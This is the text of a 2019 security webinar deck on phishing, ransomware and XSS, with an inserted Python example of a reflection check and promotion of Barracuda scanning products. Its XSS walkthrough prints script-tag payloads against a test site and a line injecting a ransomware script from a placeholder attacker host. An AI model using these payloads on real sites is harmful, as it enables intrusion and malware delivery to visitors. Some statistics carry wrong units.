“Latest Security Threat Research…and How To Protect Yourself”
11-19-2019
Agenda
• Welcome and Introductions – Chris Riley
• Email Phishing Attacks
• Web XSS Attacks
Presenters: Shawn Duffy, Principal, Duffy Compliance Services; Courtney Vick, Territory Manager, Barracuda
During the Webinar…
• Audio – In presentation mode until end
• Control Panel: view webinar in full screen mode
• Feel free to submit written questions
• Open Q & A at the end (please raise your hand & we will unmute your line)
• Survey at conclusion of webinar
We Hope You are Enjoying Your Pizza!!
Please double check with your receptionist, then contact Mike Jones: [email protected] – we will research and replace with an e-card.
(We are recording the webinar – so don’t think twice about stepping away for a few minutes to go pick it up at your front desk!)
System Source is a regional systems integrator. We have the people, processes and tools to help clients improve, maintain and acquire IT and Audio-Visual systems.
• We help IMPROVE IT operations. Clients ask us to train their staff for more productivity or rent our classrooms for private classes.
• We design PRESENTATION rooms including collaborative conference and classrooms.
• IMPROVING IT often requires top CONSULTANTS.
Shawn Duffy, Duffy Compliance Services
• Social Media profiling
• Phishing
• Ransomware
Social Media profiling
• What sites are you active on?
• What are you sharing? (images, memes)
• What are you chatting about?
• Are you looking for a job?
• Are you looking for a relationship?
• Your or someone’s health status
• Collect names of Pets & Family members
• Vacation times and destinations
• Passions (e.g., politics, religion)
Phishing
Ransomware
Cyber Extortion
• Uses strong encryption
• Payment via Bitcoin
• Plenty of Variants
Web Application - XSS
• Reflective: Non-Persistent XSS Technique
• Stored: Persistent XSS Technique
• DOM: Client side Technique
Barracuda Vulnerability Manager
https://bvm.barracudanetworks.com/login
https://www.../products/vulnerabilitymanager
Web Application – Walk thru
• Vulnerable Test Site: http://public.blorpazort.com/
Web Application – Test Results
• Barracuda Vulnerability Scan
• Partial Results for #5:
  - http://public.blorpazort.com/pages/xss_parsing_test.php: The url parameter was submitted with the value "--><script>prompt(12345)</script>OCo9e<!--, and the string was echoed verbatim in the output.
  - http://public.blorpazort.com/pages/page_header_inject.php: The fname parameter was submitted with the value <script>prompt(12345)</script>v5Kh3, and the string was echoed verbatim in the output.
  - http://public.blorpazort.com/pages/xss_form_post.php: The search parameter was submitted with the value <script>prompt(12345)</script>nI45u, and the string was echoed verbatim in the output.
Web Application – Reflective XSS
• Review of http://public.blorpazort.com/pages/xss_form_post.php
<script>prompt(12345)</script>nI45u<img src='https://duffycompliance.com/images/DCS-logo.png' />
<script src="http://<Zombie_IP/malware/ransomware.js"></script>
Web Application – Stored XSS
• Review of http://public.blorpazort.com/pages/pager_header_inject.php
• https://google-gruyere.appspot.com/start
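The "echoed verbatim" findings in the scan results above come down to one check: submit a uniquely marked value in a parameter and see whether the response reproduces it unencoded. This added example (not code from the webinar, the test site or the Barracuda scanner) simulates that check in Python against a constructed stand-in for a page like xss_form_post.php, beside the same page with HTML output encoding applied as the remediation; the handlers, the `search` parameter handling and the report wording are assumptions modelled on the quoted results.

```python
import html
import secrets
import string
from urllib.parse import parse_qs, quote


def vulnerable_page(query_string: str) -> str:
    """Constructed stand-in for a page like xss_form_post.php: the 'search'
    parameter is written into the HTML response without any encoding."""
    search = parse_qs(query_string).get("search", [""])[0]
    return f"<html><body><p>Results for: {search}</p></body></html>"


def hardened_page(query_string: str) -> str:
    """The same page with HTML-context output encoding applied (the fix)."""
    search = parse_qs(query_string).get("search", [""])[0]
    return f"<html><body><p>Results for: {html.escape(search, quote=True)}</p></body></html>"


def make_marker(length: int = 5) -> str:
    """Random alphanumeric suffix so the probe cannot collide with page text."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def check_reflection(handler, param: str, marker: str = "") -> dict:
    """Submit an inert tagged marker in one parameter and classify how the
    response reproduces it: verbatim (reflected XSS, what the scanner would
    report with confidence 'Certain'), encoded (safe), or not at all."""
    marker = marker or make_marker()
    probe = f"<b>{marker}</b>"          # harmless tag; only the encoding matters
    body = handler(f"{param}={quote(probe)}")
    if probe in body:
        verdict = "echoed verbatim"     # raw '<' and '>' survived: vulnerable
    elif html.escape(probe, quote=True) in body:
        verdict = "echoed encoded"      # browser renders text, not markup
    else:
        verdict = "not reflected"
    return {"param": param, "probe": probe, "verdict": verdict}


def report_line(finding: dict) -> str:
    """Render a finding in the style of the scan result text quoted above."""
    return (f"The {finding['param']} parameter was submitted with the value "
            f"{finding['probe']}, and the string was {finding['verdict']} in the output.")


if __name__ == "__main__":
    for handler in (vulnerable_page, hardened_page):
        print(handler.__name__ + ":", report_line(check_reflection(handler, "search")))
```

Running it prints an "echoed verbatim" line for the unencoded page and an "echoed encoded" line for the hardened one, which is the difference a report reader should expect to see after a fix.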
Web Application – Exploits
• System Security Assessments
• Network, Wireless, and Web Application
• Security Control Evaluations
• Penetration Testing
• Privacy & Cybersecurity (CUI, HIPAA, FISMA, GDPR)
• Compliance Frameworks (NIST, ISO, CSF, PF)
• Security Policy & Procedure Development
• Gap Analysis & Compliance Audits & DPIA
• Security Remediation Services
Courtney Vick, Territory Manager - Barracuda
Barracuda: Your journey, secured
Fast stats…
• Founded: 2003
• Headquartered in Silicon Valley
• Offices in over 15 countries
• Worldwide employees: 1600+
• Partners: 6500+
• Customers: 150,000+ in over 100 countries
• Revenue FY19: USD 493 million
Challenge / Why it matters
• Digital transformation: IT becoming differentiator in every function, every industry. Security concerns almost everything you do. Cloud, SaaS is the new way to support business innovation.
• LOFT & FRAG: Trained security resources are a HUGE limiting factor, especially given ever more complex security landscape.
• Protecting data is priority #1: Customer data ever more valuable, consequences of a breach never greater.
• Evolving threat landscape: Enterprise perimeter has collapsed, attacks more targeted and sophisticated. Email now THE place where most attacks start.
Customers tell us they face these challenges…
Security matters more than ever
Security is harder to manage than ever
Protecting your data is critical
Yesterday’s technology is no longer good enough
Free Vulnerability Scanner
What is an application?
Web App
Mobile App
API
How is an application secured?
Application
Servers
What percentage of apps are protected by WAFs?
Trivia
And the answer is… Today, fewer than 10%
[Chart: Frequency of Incidents. Categories: Payment Card Skimmers, Crimeware, Lost and Stolen Assets, Cyber-Espionage, Privilege Misuse, Everything Else, Point of Sale, Miscellaneous Errors, Web Applications. Bar values shown: 111, 140, 145, 171, 276, 308, 324, 347, 414.]
The #1 vector reported in business breaches
Web App Threats: the Top Emerging Vector
• Percentage of vulnerabilities that are web-based: 80%
• Percentage of cyberattacks that target web applications: 75%
• Number of malicious ad impressions per year: $12B
• Number of websites defaced in the last five years: $5M
Everyone is a Target
• Web exploitation kits available
• Easy to procure
• No expertise required
• They operate like companies
• Can attack thousands of servers in seconds
Barracuda Vulnerability Manager
• Scan for web application vulnerabilities across entire website
• Granular capability
• Detailed vulnerability scan reports
• Integration with Barracuda Web Application Firewall
• Free service
Logging In
• Go to https://bnvlm.barracuda.com and log in with your Cloud Control credentials
Easy Identification and Remediation
Barracuda WAF Integration
• Import vulnerability report
Barracuda WAF Integration
• Remediate with a single click
Creating a Scan
• Enter a scan name and the URL you wish to scan
• Click ‘Start Scan’
Monitor a Scan
• Scans can take anywhere from 5 minutes to 48 hours depending on size and complexity of the site
• You can see the progress of your scan on the Active Scans tab
Viewing Reports
• View completed scans on the Finished Scans page
Viewing Reports
• Click ‘Details’ next to a scan for a quick overview of the vulnerabilities found during the scan
• Click ‘Copy’ to start another scan with the same configuration (you can change anything necessary before starting the new scan)
• Click ‘View’ to see the scan report in a browser
• Click ‘Download’ to download the scan report in one of three formats
BVM Reports
• We’ll review each component of a Barracuda Vulnerability Manager report:
BVM Reports: Vulnerabilities
• There are four severity levels for vulnerabilities:
  - Critical: These issues could allow hackers to cause catastrophic problems with the web application, such as disabling it altogether, defacing it, or obtaining access to all of the site’s confidential data.
  - High: These issues could allow hackers unauthorized access to certain pieces of data, or access to restricted parts of the site, under certain circumstances.
  - Medium: These issues could allow hackers to perform phishing campaigns more easily, or defraud users of your application.
  - Low: These issues can cause annoyances and may affect your SEO, but there is no significant risk.
BVM Reports: Vulnerabilities
• There are three confidence levels for vulnerabilities:
  - Certain: The scanner has confirmed that the vulnerability exists.
  - Likely: The scanner is reasonably certain that the vulnerability exists, but it should be confirmed manually.
  - Possible: The scanner thinks the vulnerability may exist, but a manual check is required to confirm.
Where we shine
Verticals
• Finance / Retail (eCommerce) / Healthcare / Government
Have sensitive data to secure
• Compliance: PCI, HIPAA, GDPR
• Online retail inventory or pricing information
Public cloud
• The most deployed WAF in AWS and Azure
• Near-native integration with cloud platforms
Barracuda Email Threat Scanner
Targeted attacks start with email
74%
“Almost three quarters of all attacks start with email attachment or a link.”
2017 Threat Landscape Survey: Users on the Front Line - SANS Analyst Program
[Chart: Attacks – Increased complexity every year. Axes: Risk and complexity vs. Time (2000 to 2019). Milestones: Spam and malware; SOX, HIPAA, FINRA eDiscovery; Zero-day attacks; Phishing; Brand erosion, email trust; Ransomware; Spear phishing, whaling, BEC, CEO fraud, socially engineered phishing; Unified mobile inboxes and unsecured executive personal accounts; Account takeover (ATO).]
The challenge
[Diagram: Mail server with Firewall, DLP, Backup, Archiving, Sandboxing between the Internet and the Corporate inbox / Employees; labelled flows: Legitimate, Spam, Spear phishing, Zero day, ATO, Personal.]
Social engineering bypasses traditional approach
Most email security relies on volume / blacklisting
• IP
• Sender
• Link
• Domain
• Text
Attackers have developed counter-measures
• Zero-day links
• Malicious pages hosted on legitimate domains
• Targeted campaigns
• ATO emails seem “trusted”
Email Threat Scanner
https://www.barracuda.com/email_scan
Email Threat Scanner benefits
• One time pass of your O365 instance
• Identifies current threats already within the employee inbox
• Produce a report to visualise the business risk
• Support build of business case & further discussions
Thank you for attending today!